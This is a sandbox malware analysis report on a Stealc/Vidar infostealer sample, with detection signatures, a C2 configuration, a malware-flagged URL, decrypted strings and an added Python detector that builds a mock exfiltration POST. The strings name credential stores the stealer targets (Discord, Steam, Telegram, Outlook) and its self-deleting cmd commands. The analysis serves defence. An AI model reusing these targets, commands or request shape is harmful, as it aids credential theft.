Windows Analysis Report
oracleSuper.exe

Overview

General Information

Sample name: oracleSuper.exe
Analysis ID: 1601379
MD5: cd7754cff6dfeea0b5d8bb51abe32d7d
SHA1: dc88b17814ef892d1410b261b52e96684a7dd1b2
SHA256: 4c8b1c9ed7ba0d921b0971a3e5de96bfdb3b18024e8880c7aaa2759f13c01316
Tags: cuochiperungiorno-itexeuser-JAMESWT_MHT

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious)
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
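The description above says Stealc sends the collected data file by file over HTTP POST, and the strings recovered from the injected explorer.exe memory in this report give the shape of that request: POST, HTTP/1.1, Content-Type: multipart/form-data; boundary=----, Content-Disposition: form-data; name=", and the field names token, build, hwid, file_name, file and message. The Python below is an added example, not code from the sample, from Joe Sandbox or from Malpedia. It builds one constructed request in that shape, parses the multipart body with a small RFC 2046 splitter, and flags the combination that matters for detection: the stealer check-in fields, corroborated by the missing User-Agent header that the report's "HTTP GET or POST without a user agent" signature refers to. The host name, boundary and field values are assumptions for the example.

```python
"""Parse and triage a Stealc/Vidar-style multipart exfiltration POST (added example)."""
import re

# Form field names recovered by the report's string decryptor.
STEALER_FIELDS = {"token", "build", "hwid", "file_name", "file", "message"}


def build_sample_request(host, fields, boundary=b"----8d2f1c3a9b", with_user_agent=False):
    """Assemble a CONSTRUCTED multipart/form-data POST in the shape the decrypted strings
    describe. `fields` values are str, or (filename, bytes) for a file part. User-Agent is
    omitted by default, mirroring the report's "HTTP GET or POST without a user agent"."""
    parts = []
    for name, value in fields.items():
        disposition = b'Content-Disposition: form-data; name="' + name.encode() + b'"'
        if isinstance(value, tuple):
            filename, data = value
            disposition += b'; filename="' + filename.encode() + b'"'
            parts.append(b"--" + boundary + b"\r\n" + disposition + b"\r\n"
                         + b"Content-Type: application/octet-stream\r\n\r\n" + data + b"\r\n")
        else:
            parts.append(b"--" + boundary + b"\r\n" + disposition + b"\r\n\r\n"
                         + value.encode() + b"\r\n")
    body = b"".join(parts) + b"--" + boundary + b"--\r\n"
    headers = [b"POST / HTTP/1.1", b"Host: " + host,
               b"Content-Type: multipart/form-data; boundary=" + boundary,
               b"Content-Length: " + str(len(body)).encode()]
    if with_user_agent:
        headers.append(b"User-Agent: Mozilla/5.0")
    return b"\r\n".join(headers) + b"\r\n\r\n" + body


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method = request_line.split(b" ", 1)[0].decode()
    headers = {}
    for line in header_lines:
        key, _, val = line.partition(b":")
        headers[key.strip().lower().decode()] = val.strip().decode()
    return method, headers, body


def parse_multipart(content_type, body):
    """Return {field_name: (filename or None, payload bytes)}. Per RFC 2046 the CRLF before
    each delimiter belongs to the delimiter, so it is stripped from the preceding payload."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("multipart Content-Type without a boundary")
    delimiter = b"--" + m.group(2).encode()
    fields = {}
    for piece in body.split(delimiter):
        if piece == b"" or piece.startswith(b"--"):      # preamble or closing "--"
            continue
        piece = piece[2:] if piece.startswith(b"\r\n") else piece
        piece = piece[:-2] if piece.endswith(b"\r\n") else piece
        head, _, payload = piece.partition(b"\r\n\r\n")
        disposition = head.decode(errors="replace")
        name = re.search(r'(?<!file)name="([^"]*)"', disposition)
        filename = re.search(r'filename="([^"]*)"', disposition)
        if name:
            fields[name.group(1)] = (filename.group(1) if filename else None, payload)
    return fields


def assess_request(raw):
    """Triage one request: which stealer form fields it carries and why it looks like exfil."""
    method, headers, body = parse_http_request(raw)
    ctype = headers.get("content-type", "")
    fields, findings = {}, []
    if method == "POST" and ctype.startswith("multipart/form-data"):
        fields = parse_multipart(ctype, body)
        overlap = STEALER_FIELDS & set(fields)
        if {"hwid", "build", "token"} <= overlap:
            findings.append("stealer check-in fields: " + ", ".join(sorted(overlap)))
        if "file" in fields and "file_name" in fields:
            findings.append("file upload named via file_name="
                            + fields["file_name"][1].decode(errors="replace"))
    if "user-agent" not in headers:
        findings.append("no User-Agent header")
    return {"fields": sorted(fields), "findings": findings,
            "suspicious": any(f.startswith("stealer check-in") for f in findings)}


# Constructed sample: one file-by-file exfil POST; every value below is an assumption.
SAMPLE_FIELDS = {
    "token": "ASSUMED-TOKEN",
    "build": "default",
    "hwid": "0123456789ABCDEF",
    "file_name": "Cookies.txt",
    "file": ("Cookies.txt", b"example.test\tTRUE\t/\tFALSE\t1893456000\tsid\tabc123"),
}
SAMPLE_REQUEST = build_sample_request(b"c2.example.invalid", SAMPLE_FIELDS)

if __name__ == "__main__":
    print(assess_request(SAMPLE_REQUEST))
```

A boundary beginning with ---- is not a signal on its own (browsers and curl generate boundaries with the same prefix), so the rule keys on the form-field names and uses the missing User-Agent only as corroboration. The decrypted set also contains the string https, so for live traffic this parsing only applies where TLS is terminated, for example on a proxy or in a sandbox capture.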

AV Detection

Source: http://tea.arpdabl.org/. Avira URL Cloud: Label: malware
Source: http://tea.arpdabl.org/: Avira URL Cloud: Label: malware
Source: http://tea.arpdabl.org/Yo Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\fru Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199735694209"], "Botnet": "3ab0abf23bc38232529d79e3b78a588b"}
Source: C:\Users\user\AppData\Local\Temp\fru ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\msidcrl40.dll ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Roaming\localTask_v2\msidcrl40.dll ReversingLabs: Detection: 37%
Source: oracleSuper.exe Virustotal: Detection: 8%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\fru Joe Sandbox ML: detected
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %hu/%hu/%hu
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %hu/%hu/%hu
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DISPLAY
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DISPLAY
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: JohnDoe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: JohnDoe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HAL9TH
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HAL9TH
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VMwareVMware
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VMwareVMware
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: NtQueryInformationProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: NtQueryInformationProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sscanf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sscanf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CryptStringToBinaryA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CryptStringToBinaryA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ReleaseDC
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ReleaseDC
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetDeviceCaps
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetDeviceCaps
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CreateDCA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CreateDCA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetUserNameA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetUserNameA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ntdll.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ntdll.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: crypt32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: crypt32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: user32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: user32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: gdi32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: gdi32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: advapi32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: advapi32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SystemTimeToFileTime
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SystemTimeToFileTime
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetSystemTime
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetSystemTime
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ExitProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ExitProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrlenA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrlenA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetCurrentProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetCurrentProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetProcessHeap
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetProcessHeap
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrcpyA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrcpyA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetComputerNameA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetComputerNameA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HeapAlloc
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HeapAlloc
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualAlloc
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualAlloc
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetSystemInfo
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetSystemInfo
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualFree
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualFree
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualAllocExNuma
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualAllocExNuma
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetUserDefaultLangID
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetUserDefaultLangID
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Sleep
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Sleep
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CloseHandle
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CloseHandle
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CreateEventA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CreateEventA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: OpenEventA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: OpenEventA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrcatA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrcatA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: LoadLibraryA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: LoadLibraryA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetProcAddress
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetProcAddress
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: screenshot.jpg
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: screenshot.jpg
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: message
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: message
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: file
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: file
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: file_name
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: file_name
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: token
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: token
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: build
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: build
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: hwid
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: hwid
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HTTP/1.1
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HTTP/1.1
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: POST
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: POST
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: https
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: https
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Discord\tokens.txt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Discord\tokens.txt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Soft
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Soft
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: done
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: done
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: browsers
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: browsers
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Steam\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Steam\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: loginusers.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: loginusers.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: libraryfolders.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: libraryfolders.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DialogConfig.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DialogConfig.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: config.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: config.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ssfn*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ssfn*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \config\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \config\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SteamPath
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SteamPath
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Valve\Steam
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Valve\Steam
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: token:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: token:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: accounts.xml
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: accounts.xml
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \.purple\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \.purple\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Pidgin
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Pidgin
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000004
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000004
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000003
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000003
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000002
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000002
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000001
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000001
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Password
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Password
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.ini
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.ini
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.tox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.tox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Tox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Tox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Telegram
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Telegram
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: F8806DD0C461824F*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: F8806DD0C461824F*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: map*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: map*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: key_datas
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: key_datas
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Telegram Desktop\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Telegram Desktop\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Local Storage\leveldb
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Local Storage\leveldb
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \discord\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \discord\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Files
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Files
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.lnk
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.lnk
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %RECENT%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %RECENT%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %PROGRAMFILES%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %PROGRAMFILES%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %DOCUMENTS%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %DOCUMENTS%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %USERPROFILE%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %USERPROFILE%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %APPDATA%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %APPDATA%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %DESKTOP%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %DESKTOP%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: /c start
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: /c start
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: open
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: open
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: runas
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: runas
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: .exe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: .exe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Temp\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Temp\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: vcruntime140.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: vcruntime140.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: softokn3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: softokn3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: nss3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: nss3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: msvcp140.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: msvcp140.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: mozglue.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: mozglue.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: freebl3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: freebl3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DisplayVersion
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DisplayVersion
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DisplayName
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DisplayName
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ProcessorNameString
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ProcessorNameString
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
